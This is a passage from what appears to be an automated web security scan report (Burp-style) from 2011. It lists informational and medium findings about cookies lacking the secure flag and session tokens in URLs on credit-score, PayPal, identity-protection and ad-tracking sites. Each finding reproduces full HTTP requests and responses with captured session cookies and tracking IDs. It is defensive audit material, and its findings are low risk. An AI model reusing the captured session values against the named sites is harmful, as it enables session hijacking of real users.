ETag: "pvdcb29fc310c6ce2e8ac88af3a0c302e2"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C70872.A70594.RA0.G11457.U24A69375].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 10095

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>
           My Credit Score - Member Login | Free Credit Score
       </title>
   
...[SNIP]...

11.103. https://www.myfico.com/Store/Register.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.myfico.com
Path:   /Store/Register.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Store/Register.aspx?Product=2016&trialdays=2016d10&amuc=4,4125,39332 HTTP/1.1
Host: www.myfico.com
Connection: keep-alive
Referer: http://www.myfico.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQQACTBC=IGNPMHKBMEDEICOGCAIJAOLN; NewUser=4/24/2011 7:34:16 PM; fic=vid=197d01359d9645d58263471bdf7625b6&date=20110424073416PM&guid=&lcsource=&learningcenterprogress=&learningcentercompleted=&hasPurchased=false; TransactionID=800900002030400007100900002007; LPID=LPID=FairIsaac&LPLogoName=&LPLogoAltName=&LPLink=; MYFICO=; Experiment=47=A; ShowCCC=t; SourceProdInfo=prodid=&originid=; amcus=; amcd=f39ebcfe7b8d92f801e54dcbf76037de%2C02%2C1%2CGd%7Czg%7Czj%7Czd%7CJt%7CzK%7CJQ%7CCj%7CIV%2C1%2C7jdq%2C6%2C8C@@c_Homepage%5Dg8%2C7jcW%7C14x%2C1%2C1%7Daeo%5Dg8%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%21aep%5Dg8%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%5D0%2C7jcW@%7C%7C%7C@; __qca=P0-1792545009-1303691708467; cmTPSet=Y; CoreID6=96447579584513036917094; 90223518_clogin=l=1303691709&v=1&e=1303693593868; cmRS=&t1=1303691709454&t2=1303691711963&t3=1303691793867&lti=1303691793867&ln=&hr=http%3A//srv02.amadesa.com/Interaction2/counter%3Fpid%3D534%26uid%3Df39ebcfe7b8d92f801e54dcbf76037de.02%26vsid%3D1%26hc%3D1%26prid%3D2617%7C2186%7C2189%7C2183%7C2819%7C2216%7C2842%7C2375%7C2785%26egid%3D4923%26tid%3D4125%26ttype%3D4%26wid%3D39332%26evt%3D8%2Cw%2C39332%26red%3Dhttp%3A//www.myfico.com/Store/Register.aspx%3FProduct%3D2016%26trialdays%3D2016d10&fti=&fn=%3A0%3BaspnetForm%3A1%3Bemail_signup_module%3A2%3B&ac=&fd=&uer=&fu=&pi=Default.aspx&ho=data.coremetrics.com/eluminate%3F&ci=90223518&cjen=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
p3p: CP="ALL DSP COR CURa PSAa PSDa OUR NOR UNI STA", policyref="http://www.myfico.com/w3c/p3p.xml"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Mon, 25 Apr 2011 01:23:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 25 Apr 2011 01:23:25 GMT
Connection: keep-alive
Set-Cookie: fic=vid=197d01359d9645d58263471bdf7625b6&date=20110424073416PM&guid=&lcsource=&learningcenterprogress=&learningcentercompleted=&hasPurchased=false; expires=Mon, 23-Apr-2012 05:00:00 GMT; path=/
Set-Cookie: ShowCCC=t; domain=.myfico.com; path=/
Set-Cookie: SourceProdInfo=prodid=&originid=; path=/
Set-Cookie: MYFICO=trialdays2016=10&NewPurchaser=yes; path=/
Set-Cookie: PromoCode=; path=/
Set-Cookie: PromoCode=; path=/
Content-Length: 39835

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" >


<html>
<head><title>
   Please Log In or Create an Account
</title>
<meta http-equiv="X-UA-Comp
...[SNIP]...

11.104. https://www.myfico.com/Store/Register.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.myfico.com
Path:   /Store/Register.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /Store/Register.aspx?Product=2016&trialdays=2016d10&amuc=4%2c4125%2c39332 HTTP/1.1
Host: www.myfico.com
Connection: keep-alive
Referer: https://www.myfico.com/Store/Register.aspx?Product=2016&trialdays=2016d10&amuc=4,4125,39332
Cache-Control: max-age=0
Origin: https://www.myfico.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQQACTBC=IGNPMHKBMEDEICOGCAIJAOLN; TransactionID=800900002030400007100900002007; LPID=LPID=FairIsaac&LPLogoName=&LPLogoAltName=&LPLink=; Experiment=47=A; amcus=; amcd=f39ebcfe7b8d92f801e54dcbf76037de%2C02%2C1%2CGd%7Czg%7Czj%7Czd%7CJt%7CzK%7CJQ%7CCj%7CIV%2C1%2C7jdq%2C6%2C8C@@c_Homepage%5Dg8%2C7jcW%7C14x%2C1%2C1%7Daeo%5Dg8%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%21aep%5Dg8%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%5D0%2C7jcW@%7C%7C%7C@; __qca=P0-1792545009-1303691708467; cmTPSet=Y; CoreID6=96447579584513036917094; MYFICO=trialdays2016=10&NewPurchaser=yes; PromoCode=; acopendivids=nada; acgroupswithpersist=nada; 90223518_clogin=l=1303691709&v=1&e=1303693603459; NewUser=4/24/2011 7:37:16 PM; fic=vid=197d01359d9645d58263471bdf7625b6&date=20110424073416PM&guid=&lcsource=&learningcenterprogress=&learningcentercompleted=&hasPurchased=false; ShowCCC=t; SourceProdInfo=prodid=&originid=; 90223518_clogin=l=1303691709&v=1&e=1303693688117; cmRS=&t1=1303691803452&t2=-1&t3=1303691888115&t4=1303691798835&fti=1303691888115&fn=aspnetForm%3A0%3B&ac=0:S&fd=0%3A8%3Actl00%24cphMainContent%24oLoginControl%24Button1%3B&uer=&fu=Register.aspx%3FProduct%3D2016%26trialdays%3D2016d10%26amuc%3D4%252c4125%252c39332&pi=Store/Register.aspx&ho=data.coremetrics.com/eluminate%3F&ci=90223518&ul=https%3A//www.myfico.com/Store/Register.aspx%3FProduct%3D2016%26trialdays%3D2016d10%26amuc%3D4%2C4125%2C39332&rf=http%3A//www.myfico.com/Default.aspx&cjen=1
Content-Length: 4879

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTYwNjQ2MjUxNQ9kFgJmD2QWCGYPZBYEZg8WAh4HVmlzaWJsZWhkAgEPFgIfAGdkAgIPZBYGAgEPFgIfAGdkAgUPFgIeBGhyZWYFDS9jc3MvZmljby5jc3NkAgYPFgIfAGhkAgQPZBYMZg9kFg
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
p3p: CP="ALL DSP COR CURa PSAa PSDa OUR NOR UNI STA", policyref="http://www.myfico.com/w3c/p3p.xml"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Mon, 25 Apr 2011 00:37:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 25 Apr 2011 00:37:56 GMT
Connection: keep-alive
Set-Cookie: NewUser=4/24/2011 7:37:18 PM; path=/
Set-Cookie: fic=vid=197d01359d9645d58263471bdf7625b6&date=20110424073416PM&guid=&lcsource=&learningcenterprogress=&learningcentercompleted=&hasPurchased=false; expires=Mon, 23-Apr-2012 05:00:00 GMT; path=/
Set-Cookie: ShowCCC=t; domain=.myfico.com; path=/
Set-Cookie: SourceProdInfo=prodid=&originid=; path=/
Content-Length: 40429

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" >


<html>
<head><title>
   Please Log In or Create an Account
</title>
<meta http-equiv="X-UA-Comp
...[SNIP]...

11.105. https://www.myfico.com/SystemAccess/ForgotMemberInfo.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.myfico.com
Path:   /SystemAccess/ForgotMemberInfo.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /SystemAccess/ForgotMemberInfo.aspx?ReturnUrl=&CreditKit=&& HTTP/1.1
Host: www.myfico.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQQACTBC=IGNPMHKBMEDEICOGCAIJAOLN; TransactionID=800900002030400007100900002007; LPID=LPID=FairIsaac&LPLogoName=&LPLogoAltName=&LPLink=; Experiment=47=A; amcus=; amcd=f39ebcfe7b8d92f801e54dcbf76037de%2C02%2C1%2CGd%7Czg%7Czj%7Czd%7CJt%7CzK%7CJQ%7CCj%7CIV%2C1%2C7jdq%2C6%2C8C@@c_Homepage%5Dg8%2C7jcW%7C14x%2C1%2C1%7Daeo%5Dg8%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%21aep%5Dg8%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%5D0%2C7jcW@%7C%7C%7C@; __qca=P0-1792545009-1303691708467; cmTPSet=Y; CoreID6=96447579584513036917094; NewUser=4/24/2011 7:35:48 PM; fic=vid=197d01359d9645d58263471bdf7625b6&date=20110424073416PM&guid=&lcsource=&learningcenterprogress=&learningcentercompleted=&hasPurchased=false; ShowCCC=t; SourceProdInfo=prodid=&originid=; MYFICO=trialdays2016=10&NewPurchaser=yes; PromoCode=; acopendivids=nada; acgroupswithpersist=nada; 90223518_clogin=l=1303691709&v=1&e=1303693603459; 90223518_clogin=l=1303691709&v=1&e=1303693603470

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
p3p: CP="ALL DSP COR CURa PSAa PSDa OUR NOR UNI STA", policyref="http://www.myfico.com/w3c/p3p.xml"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Mon, 25 Apr 2011 01:27:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 25 Apr 2011 01:27:45 GMT
Connection: keep-alive
Set-Cookie: fic=vid=197d01359d9645d58263471bdf7625b6&date=20110424073416PM&guid=&lcsource=&learningcenterprogress=&learningcentercompleted=&hasPurchased=false; expires=Mon, 23-Apr-2012 05:00:00 GMT; path=/
Set-Cookie: ShowCCC=t; domain=.myfico.com; path=/
Set-Cookie: SourceProdInfo=prodid=&originid=; path=/
Content-Length: 23918

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" >

<html>
<head><title>
   Forgot your Login ID or Password?
</title>
<meta http-equiv="X-UA-Compatible"
...[SNIP]...

11.106. https://www.paypal.com/cgi-bin/webscr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.paypal.com
Path:   /cgi-bin/webscr

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/webscr HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:52:47 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: cwrClyrK4LoCV1fydGbAxiNL6iG=sT_I63NuUR8LcE-tuRsQ5JgX5j4FM6fbZrEXkeGREDWPCDpPdl4qfrs6ypGS8IgVxSjjxsRKnGeafhSyMq1ZS1PJW3n0n15HpMokWcZjOuxriDljpK5cu_5qm33nM3QcMOJp-0%7c0mUK39OzvMDBZKIY55RYJ6j_BtoDi5ockOySsmyAlvUwdtM-jxqcTWjhEO6-fDz0fbHX10%7cBr7I2M0muunKbPwJZggbyDS6A5tobB-8N0Tk4dp5P1igDVsWXpxDcsmgKFTN_I1XuL1u-G%7c1303663968; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: KHcl0EuY7AKSMgfvHl7J5E7hPtK=ly4prVVJG_b0nU4XMqMUklBtFWWgyHjwVp8kw7WCtMl1PTFxLmM-9ciCTN0y1zlmQwmDRdwh1nRQZrtB; expires=Sat, 19-Apr-2031 16:52:48 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: cookie_check=yes; expires=Wed, 21-Apr-2021 16:52:48 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; expires=Wed, 21-Apr-2021 16:52:48 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Sat, 19-Apr-2031 16:52:48 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: Apache=10.190.8.159.1303663967738130; path=/; expires=Tue, 16-Apr-41 16:52:47 GMT
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31254

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#">
<head>
<meta http-equiv="C
...[SNIP]...

11.107. https://www.senderscore.org/landing/ppcregistration/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.senderscore.org
Path:   /landing/ppcregistration/index.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /landing/ppcregistration/index.php?campid=701000000005Ucl&s_kwcid=TC|13707|reputation%20monitoring||S|b|6248101451&gclid=CMrtpuG1tqgCFQVN4AodmBn1DQ HTTP/1.1
Host: www.senderscore.org
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:30:54 GMT
Server: Apache/2.2.9 (Unix) DAV/2 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: campid=701000000005Ucl; expires=Wed, 25-May-2011 01:30:54 GMT; path=/; domain=www.senderscore.org; httponly
Set-Cookie: ss_lookup=ff42t7omks9m225jgdh0f4huh1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerw3pub=3372373002.20480.0000; path=/
Content-Length: 33327


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="style.css" re
...[SNIP]...

11.108. https://www.trustedid.com/cmalp1.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /cmalp1.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cmalp1.php?promoRefCode=SEMGOOGCM14DF&gclid=CLTp5ZX1tagCFUSo4Aod61iHCA HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: promoRefCode=NXTIDF01IDEFT

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:23:36 GMT
Server: Apache
Set-Cookie: TIDT=173.193.214.243.1303676616385263; path=/; domain=.trustedid.com
Set-Cookie: TSI=n9aijp6kmv2idr7asjh3a48343; path=/; domain=www.trustedid.com; secure; HttpOnly
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: promoRefCode=SEMGOOGCM14DF; expires=Tue, 24-May-2011 20:23:36 GMT; path=/; domain=.trustedid.com; secure
Set-Cookie: refCode=deleted; expires=Sat, 24-Apr-2010 20:23:35 GMT; path=/; domain=.trustedid.com; secure
Set-Cookie: TSI=tsis0amhjkv950im9ira5ikvg6; path=/; domain=www.trustedid.com; secure; HttpOnly
Set-Cookie: promoRefCode=SEMGOOGCM14DF; expires=Tue, 24-May-2011 20:23:36 GMT; path=/; domain=.trustedid.com; secure
Last-Modified: Sun, 24 Apr 2011 20:23:36 GMT
Cache-Control: post-check=0, pre-check=0
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 20733

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html >
<head>

<title>TrustedID - America's Identity Theft Protection Company - Identity Theft P
...[SNIP]...

11.109. https://www.trustedid.com/idfide01/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /idfide01/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /idfide01/?promoCodeRefIde=NXTIDF01IDEFT&promoCodeRefIdf=NXTIDF01IDFFT15 HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:12:34 GMT
Server: Apache
Set-Cookie: TIDT=173.193.214.243.1303614754152763; path=/; domain=.trustedid.com
Set-Cookie: TSI=6rjj85kupb6n5r77pnlgtoq3g0; path=/; domain=www.trustedid.com; secure; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 10457

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Best-in-class Identity Protection</title>
<meta content="text/ht
...[SNIP]...

11.110. https://www.trustedid.com/suzeidprotector/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /suzeidprotector/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /suzeidprotector/?promoRefCode=NXDIRSUZIDPANN HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:12:19 GMT
Server: Apache
Set-Cookie: TIDT=173.193.214.243.1303614739643665; path=/; domain=.trustedid.com
Set-Cookie: TSI=lsgdamrpaddiv88ogrb60v3bq3; path=/; domain=www.trustedid.com; secure; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: promoRefCode=NXDIRSUZIDPANN; expires=Tue, 24-May-2011 03:12:19 GMT; path=/; domain=.trustedid.com; secure
Set-Cookie: refCode=deleted; expires=Sat, 24-Apr-2010 03:12:18 GMT; path=/; domain=.trustedid.com; secure
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 12420

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Identity Theft Protection from Suze Orman</title>
<meta content=
...[SNIP]...

12. Session token in URL  previous  next
There are 16 instances of this issue:


12.1. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /bh/set.aspx?action=replace&advid=541&token=LIFL1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|534889.z2r8aytrpwakd.0|535461.2931142961646634775.1; V=wOebwAz4UvVv; cwbh1=541%3B05%2F23%2F2011%3BLIFL1

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web84
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Wed, 18-Apr-2012 03:08:32 GMT; Path=/
Set-Cookie: cwbh1=541%3B05%2F23%2F2011%3BLIFL1; Domain=.contextweb.com; Expires=Mon, 28-Mar-2016 03:08:32 GMT; Path=/
Content-Type: image/gif
Date: Sun, 24 Apr 2011 03:08:32 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

12.2. http://consumerinfo.tt.omtrdc.net/m2/consumerinfo/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://consumerinfo.tt.omtrdc.net
Path:   /m2/consumerinfo/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/consumerinfo/mbox/standard?mboxHost=www.freecreditscore.com&mboxSession=1303674291453-51326&mboxPage=1303674291453-51326&mboxCount=1&mbox=FCS_LP21_TopSection&mboxId=0&mboxTime=1303656291456&mboxURL=http%3A%2F%2Fwww.freecreditscore.com%2Fdni%2Fdefault.aspx%3FPageTypeID%3DHomePage21%26SiteVersionID%3D932%26SiteID%3D100323%26sc%3D671212%26bcd%3D&mboxReferrer=&mboxVersion=38 HTTP/1.1
Host: consumerinfo.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.freecreditscore.com/dni/default.aspx?PageTypeID=HomePage21&SiteVersionID=932&SiteID=100323&sc=671212&bcd=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 173
Date: Sun, 24 Apr 2011 19:54:32 GMT
Server: Test & Target

mboxFactories.get('default').get('FCS_LP21_TopSection',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1303674291453-51326.17");

12.3. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /activityi;src=1883957;type=nonse241;cat=homep792;ord=1;num=5926853162236.512? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.creditchecktotal.com/default.aspx?sc=668032&bcd=TotalCompare
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sun, 24 Apr 2011 20:44:35 GMT
Expires: Sun, 24 Apr 2011 20:44:35 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 935

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1697&token=FCRT1" width="1" height="1" border="0"><img src="http://ad.doubleclick.net/activity;src=2055485;dcnet=4845;boom=37225;sz=1x1;ord=1?"width="1" height="1" border="0" alt="">
...[SNIP]...

12.4. http://khm0.googleapis.com/kh  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://khm0.googleapis.com
Path:   /kh

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

